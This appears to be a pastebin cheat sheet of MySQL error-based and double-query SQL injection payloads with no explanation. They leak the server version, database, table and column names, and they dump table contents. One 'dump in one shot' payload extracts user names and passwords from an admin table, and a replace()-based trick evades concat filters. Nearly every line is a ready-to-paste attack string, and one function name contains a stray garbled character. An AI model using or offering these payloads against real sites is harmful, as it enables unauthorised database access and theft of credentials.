SHOW:
|
|
- or go back to the newest paste.
1 | Error Base Double query use | |
2 | a. The Used Select Statements Have Different Number Of Columns. | |
3 | b. Unknown Column 1 or no columns at all (in webpage and page source) | |
4 | c. Error #1604 | |
5 | ||
6 | ||
7 | Show Version | |
8 | or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1 | |
9 | ||
10 | ||
11 | Show Database | |
12 | and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) | |
13 | ||
14 | ||
15 | Show tables | |
16 | and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) | |
17 | ||
18 | ||
19 | Show columns | |
20 | and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTable limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) | |
21 | ||
22 | Dump data from columns | |
23 | and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) | |
24 | ||
25 | ||
26 | ||
27 | ||
28 | ---------------------------------------------------- | |
29 | ||
30 | Error Base | |
31 | and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) | |
32 | ||
33 | Error Base Double Query | |
34 | ||
35 | Show Version | |
36 | and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 | |
37 | ||
38 | Show Database | |
39 | and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 | |
40 | ||
41 | Show Table from database | |
42 | and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xDatabase_Name LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 | |
43 | ||
44 | Show Column from table | |
45 | and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0xDatabase_name AND table_name=0xTable_name LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 | |
46 | ||
47 | ||
48 | Dump Data from column | |
49 | and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `security`.table_name LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 | |
50 | -------------------------------------------------------- | |
51 | ||
52 | Dump in one Shot ( Database,Table,Column ) | |
53 | (select (@x) from (select (@x:=0x00), (select (0) from (information_schema.columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=/*!50000concat*/(@x,0x3c62723e,table_schema,0x272d2d3e27,table_name,0x272d2d3e27,column_name))))x) | |
54 | ||
55 | ||
56 | (select (@) from (select (@:=0x00), (select (@) from tbl_admin_info where (@) in (@:=/*!50000concat*/(@,user_name,0x3a,password))))a) | |
57 | ------------------------------------------------------ | |
58 | ||
59 | if concat block use replace function | |
60 | ||
61 | replace(REPLACE(replace(0x5b215d,0x5b,version()),0x21,database()),0x5d,usβer()) |